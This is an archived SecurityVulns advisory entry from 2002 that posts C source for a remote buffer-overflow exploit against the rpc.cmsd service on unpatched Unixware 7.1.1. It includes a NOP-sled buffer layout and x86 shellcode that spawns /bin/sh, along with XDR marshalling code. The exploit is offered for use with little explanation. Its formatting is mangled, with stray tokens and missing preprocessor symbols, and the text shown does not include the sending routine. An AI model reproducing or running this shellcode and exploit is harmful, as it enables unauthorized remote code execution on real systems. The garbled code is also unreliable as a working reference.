Unixware 7.1.1 rpc.cmsd remote exploit code.

2002-01-11T00:00:00
ID SECURITYVULNS:DOC:2355
Type securityvulns
Reporter Securityvulns
Modified 2002-01-11T00:00:00

Description

Hi, I'm jGgM.

Here is unixware 7.1.1 rpc.cmsd remote exploit code.

This is old bug. ( Currently patched....maybe.. )

This works only not -patched Unixware 7.1.1.


Korean security Info.. by jGgM.

http://www.forsecure.com/

http://www.netemperor.com/


/*

  • Unixware 7.x rpc.cmsd exploit by jGgM

  • http://www.netemperor.com/en/

  • EMail: jggm@mail.com

*/

include <stdlib.h>

include <stdio.h>

include <string.h>

include <unistd.h>

include <rpc/rpc.h>

define CMSD_PROG 100068

define CMSD_VERS 4

define CMSD_PROC 21

define BUFFER_SIZE 1036

define SHELL_START 1024

define RET_LENGTH 12

define ADJUST 100

define NOP 0x90

define LEN 68

char shell[] =

/ 0 / "\xeb\x3d" /* jmp springboard

[2000]*/

/ syscall: [2000]/

/ 2 / "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0

[2000]*/

/ 9 / "\xc3" / ret [2000]/

/ start: [2000]/

/ 10 / "\x5e" /* popl %esi

[2000]*/

/ 11 / "\x31\xc0" /* xor %eax,%eax

[2000]*/

/ 13 / "\x89\x46\xbf" /* movl %eax,-

0x41(%esi) */

/ 16 / "\x88\x46\xc4" /* movb %al,-0x3c

(%esi) */

/ 19 / "\x89\x46\x0c" /* movl %eax,0xc

(%esi) */

/ 22 / "\x88\x46\x17" /* movb %al,0x17

(%esi) */

/ 25 / "\x88\x46\x1a" /* movb %al,0x1a

(%esi) */

/ 28 / "\x88\x46\xff" /* movb %al,0x??

(%esi) */

/ execve: [2000]/

/ 31 / "\x31\xc0" /* xor %eax,%eax

[2000]*/

/ 33 / "\x50" /* pushl %eax

[2000]*/

/ 34 / "\x56" /* pushl %esi

[2000]*/

/ 35 / "\x8d\x5e\x10" /* leal 0x10(%

esi),%ebx */

/ 38 / "\x89\x1e" /* movl %ebx,(%

esi)[2000]*/

/ 40 / "\x53" /* pushl %ebx

[2000]*/

/ 41 / "\x8d\x5e\x18" /* leal 0x18(%

esi),%ebx */

/ 44 / "\x89\x5e\x04" /* movl %ebx,0x4

(%esi) */

/ 47 / "\x8d\x5e\x1b" /* leal 0x1b(%

esi),%ebx */

/ 50 / "\x89\x5e\x08" /* movl %ebx,0x8

(%esi) */

/ 53 / "\xb0\x3b" /* movb $0x3b,%al

[2000]*/

/ 55 / "\xe8\xc6\xff\xff\xff" /* call syscall

[2000]*/

/ 60 / "\x83\xc4\x0c" /* addl $0xc,%

esp [2000]*/

/ springboard: [2000]/

/ 63 / "\xe8\xc6\xff\xff\xff" /* call start

[2000]*/

/ data: [2000]/

/ 68 / "\xff\xff\xff\xff" /* DATA [2000]

*/

/ 72 / "\xff\xff\xff\xff" /* DATA [2000]

*/

/ 76 / "\xff\xff\xff\xff" /* DATA [2000]

*/

/ 80 / "\xff\xff\xff\xff" /* DATA [2000]

*/

/ 84 / "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /*

DATA [2000]*/

/ 92 / "\x2d\x63\xff"; /* DATA

[2000]*/

struct cm_send {

char *s1;

char *s2;

};

struct cm_reply {

int i;

};

bool_t xdr_cm_send(XDR *xdrs, struct cm_send

*objp)

{

if(!xdr_wrapstring(xdrs, &objp->s1))

  return &#40;FALSE&#41;;

if(!xdr_wrapstring(xdrs, &objp->s2))

   return &#40;FALSE&#41;;

return (TRUE);

}

bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply

*objp)

{

if(!xdr_int(xdrs, &objp->i))

  return &#40;FALSE&#41;;

return (TRUE);

}